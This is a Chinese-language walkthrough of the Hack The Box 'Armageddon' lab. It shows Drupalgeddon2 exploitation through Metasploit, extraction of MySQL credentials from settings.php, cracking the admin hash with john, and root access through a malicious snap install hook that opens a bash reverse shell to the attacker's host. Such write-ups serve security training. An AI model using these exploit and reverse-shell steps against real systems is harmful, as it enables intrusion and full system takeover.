Armageddon-htb-writeup

0x00 靶场技能介绍

章节技能：Drupalgeddon2漏洞利用、MySQL数据库密码泄露、sudo-snap提权

参考链接：https://medium.com/@joemcfarland/hack-the-box-armageddon-writeup-4f94be2b3485

参考链接：https://khaoticdev.net/hack-the-box-armageddon/

参考链接：https://otrashoui.xyz/armageddon/

0x01 用户权限获取

1、获取下靶机IP地址：10.10.10.233

2、获取下开放端口情况

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.233    
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-24 13:10 CST
Warning: 10.10.10.233 giving up on port because retransmission cap hit (10).
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.10.10.233
Host is up (0.41s latency).
Not shown: 52521 filtered tcp ports (no-response), 13012 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 91.60 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80 -T4 --min-rate=5000 10.10.10.233
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-24 13:12 CST
Nmap scan report for 10.10.10.233
Host is up (0.39s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
|   256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_  256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Welcome to  Armageddon |  Armageddon

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.39 seconds

3、通过Wappalyzer知道这个是Drupal7的cms应用

4、通过 CHANGELOG.txt 文件，获取到当前具体版本信息

http://10.10.10.233/CHANGELOG.txt

5、通过搜集当前版本，发现存在一些RCE漏洞

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit Drupal 7.56
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                            |  Path
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                                                  | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                                                  | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                                               | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                                       | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)                                   | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)                                   | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)                                          | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)                     | php/remote/46510.rb
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)                     | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution                                                            | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution                                                                        | php/webapps/46459.py
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

6、直接使用msf开搞

┌──(kali㉿kali)-[~/桌面]
└─$ msfconsole 
Metasploit tip: Metasploit can be configured at startup, see msfconsole 
--help to learn more
msf6 > search 'Drupalgeddon2' Remote Code Execution
[-] No results from search
msf6 > search Drupalgeddon2

Matching Modules
================

   #  Name                                      Disclosure Date  Rank       Check  Description
   -  ----                                      ---------------  ----       -----  -----------
   0  exploit/unix/webapp/drupal_drupalgeddon2  2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection

Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/drupal_drupalgeddon2

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options 

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.230.130   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)

View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 10.10.14.2
LHOST => 10.10.14.2
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 10.10.10.233
RHOSTS => 10.10.10.233
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit 

[*] Started reverse TCP handler on 10.10.14.2:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (39927 bytes) to 10.10.10.233
[*] Meterpreter session 1 opened (10.10.14.2:4444 -> 10.10.10.233:36606) at 2023-12-24 13:28:09 +0800

meterpreter > shell
Process 2385 created.
Channel 0 created.
id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0

7、但是在查看home目录时，发现权限非常的低

ls
CHANGELOG.txt
COPYRIGHT.txt
INSTALL.mysql.txt
INSTALL.pgsql.txt
INSTALL.sqlite.txt
INSTALL.txt
LICENSE.txt
MAINTAINERS.txt
README.txt
UPGRADE.txt
authorize.php
cron.php
includes
index.php
install.php
misc
modules
profiles
robots.txt
scripts
sites
themes
update.php
web.config
xmlrpc.php
pwd
/var/www/html
ls -la /home
ls: cannot open directory /home: Permission denied

8、通过翻看当前网站目录下的配置信息，成功发现某数据的密码

ls -la
total 284
drwxr-xr-x.  9 apache apache   4096 Dec 14  2020 .
drwxr-xr-x.  4 root   root       33 Dec  3  2020 ..
-rw-r--r--.  1 apache apache    317 Jun 21  2017 .editorconfig
-rw-r--r--.  1 apache apache    174 Jun 21  2017 .gitignore
-rw-r--r--.  1 apache apache   6112 Jun 21  2017 .htaccess
-rw-r--r--.  1 apache apache 111613 Jun 21  2017 CHANGELOG.txt
-rw-r--r--.  1 apache apache   1481 Jun 21  2017 COPYRIGHT.txt
-rw-r--r--.  1 apache apache   1717 Jun 21  2017 INSTALL.mysql.txt
-rw-r--r--.  1 apache apache   1874 Jun 21  2017 INSTALL.pgsql.txt
-rw-r--r--.  1 apache apache   1298 Jun 21  2017 INSTALL.sqlite.txt
-rw-r--r--.  1 apache apache  17995 Jun 21  2017 INSTALL.txt
-rw-r--r--.  1 apache apache  18092 Nov 16  2016 LICENSE.txt
-rw-r--r--.  1 apache apache   8710 Jun 21  2017 MAINTAINERS.txt
-rw-r--r--.  1 apache apache   5382 Jun 21  2017 README.txt
-rw-r--r--.  1 apache apache  10123 Jun 21  2017 UPGRADE.txt
-rw-r--r--.  1 apache apache   6604 Jun 21  2017 authorize.php
-rw-r--r--.  1 apache apache    720 Jun 21  2017 cron.php
drwxr-xr-x.  4 apache apache   4096 Jun 21  2017 includes
-rw-r--r--.  1 apache apache    529 Jun 21  2017 index.php
-rw-r--r--.  1 apache apache    703 Jun 21  2017 install.php
drwxr-xr-x.  4 apache apache   4096 Dec  4  2020 misc
drwxr-xr-x. 42 apache apache   4096 Jun 21  2017 modules
drwxr-xr-x.  5 apache apache     70 Jun 21  2017 profiles
-rw-r--r--.  1 apache apache   2189 Jun 21  2017 robots.txt
drwxr-xr-x.  2 apache apache    261 Jun 21  2017 scripts
drwxr-xr-x.  4 apache apache     75 Jun 21  2017 sites
drwxr-xr-x.  7 apache apache     94 Jun 21  2017 themes
-rw-r--r--.  1 apache apache  19986 Jun 21  2017 update.php
-rw-r--r--.  1 apache apache   2200 Jun 21  2017 web.config
-rw-r--r--.  1 apache apache    417 Jun 21  2017 xmlrpc.php
cd sites
ls -la
total 12
drwxr-xr-x. 4 apache apache   75 Jun 21  2017 .
drwxr-xr-x. 9 apache apache 4096 Dec 14  2020 ..
-rw-r--r--. 1 apache apache  904 Jun 21  2017 README.txt
drwxr-xr-x. 5 apache apache   52 Jun 21  2017 all
dr-xr-xr-x. 3 apache apache   67 Dec  3  2020 default
-rw-r--r--. 1 apache apache 2365 Jun 21  2017 example.sites.php
cd default
ls -la
total 56
dr-xr-xr-x. 3 apache apache    67 Dec  3  2020 .
drwxr-xr-x. 4 apache apache    75 Jun 21  2017 ..
-rw-r--r--. 1 apache apache 26250 Jun 21  2017 default.settings.php
drwxrwxr-x. 3 apache apache    37 Dec  3  2020 files
-r--r--r--. 1 apache apache 26565 Dec  3  2020 settings.php
cat setting.php
cat: setting.php: No such file or directory
cat settings.php
<?php
$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'CQHEy@9M*m23gBVj',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
# $conf['allow_css_double_underscores'] = TRUE;

9、然后使用查看mysql数据库里的文件，发现了某个用户的账号和加密密文

mysql -u 'drupaluser' --password='CQHEy@9M*m23gBVj' -e 'show databases'
Database
information_schema
drupal
mysql
performance_schema

mysql -u 'drupaluser' --password='CQHEy@9M*m23gBVj' -D drupal -e 'show tables'
Tables_in_drupal
actions
authmap
batch
block
block_custom
block_node_type
block_role
blocked_ips
cache
cache_block
cache_bootstrap
cache_field
cache_filter
cache_form
cache_image
cache_menu
cache_page
cache_path
comment
date_format_locale
date_format_type
date_formats
field_config
field_config_instance
field_data_body
field_data_comment_body
field_data_field_image
field_data_field_tags
field_revision_body
field_revision_comment_body
field_revision_field_image
field_revision_field_tags
file_managed
file_usage
filter
filter_format
flood
history
image_effects
image_styles
menu_custom
menu_links
menu_router
node
node_access
node_comment_statistics
node_revision
node_type
queue
rdf_mapping
registry
registry_file
role
role_permission
search_dataset
search_index
search_node_links
search_total
semaphore
sequences
sessions
shortcut_set
shortcut_set_users
system
taxonomy_index
taxonomy_term_data
taxonomy_term_hierarchy
taxonomy_vocabulary
url_alias
users
users_roles
variable
watchdog

mysql -u 'drupaluser' --password='CQHEy@9M*m23gBVj' -D drupal -e 'describe users'
Field   Type    Null    Key     Default Extra
uid     int(10) unsigned        NO      PRI     0
name    varchar(60)     NO      UNI
pass    varchar(128)    NO
mail    varchar(254)    YES     MUL
theme   varchar(255)    NO
signature       varchar(255)    NO
signature_format        varchar(255)    YES             NULL
created int(11) NO      MUL     0
access  int(11) NO      MUL     0
login   int(11) NO              0
status  tinyint(4)      NO              0
timezone        varchar(32)     YES             NULL
language        varchar(12)     NO
picture int(11) NO      MUL     0
init    varchar(254)    YES
data    longblob        YES             NULL

mysql -u 'drupaluser' --password='CQHEy@9M*m23gBVj' -D drupal -e 'select uid,name,pass,login from users'
uid     name    pass    login
0                       0
1       brucetherealadmin       $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt 1607076276

10、通过使用john 成功破解出密码

┌──(kali㉿kali)-[~/桌面]
└─$ touch hash    
            
┌──(kali㉿kali)-[~/桌面]
└─$ echo '$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt' > hash

┌──(kali㉿kali)-[~/桌面]
└─$ cat hash
$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt

┌──(kali㉿kali)-[~/桌面]
└─$ sudo john ./hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (Drupal7, $S$ [SHA512 128/128 ASIMD 2x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
booboo           (?)     
1g 0:00:00:00 DONE (2023-12-24 13:43) 1.639g/s 472.1p/s 472.1c/s 472.1C/s alyssa..brenda
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

11、使用该账号密码，成功获取到第一个初始权限和flag信息

┌──(kali㉿kali)-[~/桌面]
└─$ ssh brucetherealadmin@10.10.10.233
The authenticity of host '10.10.10.233 (10.10.10.233)' can't be established.
ED25519 key fingerprint is SHA256:rMsnEyZLB6x3S3t/2SFrEG1MnMxicQ0sVs9pFhjchIQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.233' (ED25519) to the list of known hosts.
brucetherealadmin@10.10.10.233's password: 
Last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5
[brucetherealadmin@armageddon ~]$ 
[brucetherealadmin@armageddon ~]$ pwd
/home/brucetherealadmin
[brucetherealadmin@armageddon ~]$ ls -la
总用量 16
drwx------. 2 brucetherealadmin brucetherealadmin  99 12月 14 2020 .
drwxr-xr-x. 3 root              root               31 12月  3 2020 ..
lrwxrwxrwx. 1 root              root                9 12月 11 2020 .bash_history -> /dev/null
-rw-r--r--. 1 brucetherealadmin brucetherealadmin  18 4月   1 2020 .bash_logout
-rw-r--r--. 1 brucetherealadmin brucetherealadmin 193 4月   1 2020 .bash_profile
-rw-r--r--. 1 brucetherealadmin brucetherealadmin 231 4月   1 2020 .bashrc
-r--------. 1 brucetherealadmin brucetherealadmin  33 12月 24 05:04 user.txt
[brucetherealadmin@armageddon ~]$ cat user.txt
3e12791d3ad83a22fdae991fde3fa5ac
[brucetherealadmin@armageddon ~]$

0x02 系统权限获取

12、通过查看 sudo -l 信息，发现了提权的路径

[brucetherealadmin@armageddon ~]$ sudo -l
匹配 %2$s 上 %1$s 的默认条目：
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME
    LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

用户 brucetherealadmin 可以在 armageddon 上运行以下命令：
    (root) NOPASSWD: /usr/bin/snap install *
[brucetherealadmin@armageddon ~]$ 

13、通过 gtfobins网站获取到提权的方法，但是需要在本地生成一个安装包材料

https://gtfobins.github.io/gtfobins/snap/

COMMAND=id
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n xxxx -s dir -t snap -a all meta

sudo snap install xxxx_1.0_all.snap --dangerous --devmode

14、我们本地装下生成下

┌──(kali㉿kali)-[~/桌面]
└─$ sudo apt install snapd

┌──(kali㉿kali)-[~/桌面]
└─$ sudo gem install --no-document fpm

┌──(kali㉿kali)-[~/桌面]
└─$ mkdir -p snap/meta/hooks
    
┌──(kali㉿kali)-[~/桌面]
└─$ cd snap

┌──(kali㉿kali)-[~/桌面/snap]
└─$ cmd="bash -c 'bash -i >& /dev/tcp/10.10.14.2/10086 0>&1'"

┌──(kali㉿kali)-[~/桌面/snap]
└─$ printf '#!/bin/sh\n%s ; false' "$cmd" > meta/hooks/install

┌──(kali㉿kali)-[~/桌面/snap]
└─$ chmod +x meta/hooks/install

┌──(kali㉿kali)-[~/桌面/snap]
└─$ fpm -n gibshellplz -s dir -t snap -a all meta
Created package {:path=>"gibshellplz_1.0_all.snap"}

┌──(kali㉿kali)-[~/桌面]
└─$ scp -r ./gibshellplz_1.0_all.snap brucetherealadmin@10.10.10.233:/tmp
brucetherealadmin@10.10.10.233's password: 
gibshellplz_1.0_all.snap                               100% 4096     6.1KB/s   00:00

15、然后我们在靶机上安装下这个包，并获取到最终的flag信息

[brucetherealadmin@armageddon ~]$ cd /tmp
[brucetherealadmin@armageddon tmp]$ ls
gibshellplz_1.0_all.snap
[brucetherealadmin@armageddon tmp]$ sudo snap install gibshellplz_1.0_all.snap --dangerous --devmode

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.233] 53286
bash: cannot set terminal process group (3172): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.3# id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_service_t:s0
bash-4.3# cat /root/root.txt
cat /root/root.txt
8bb4322f36c2e554f3fde22a03f9f5da
bash-4.3# 

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/323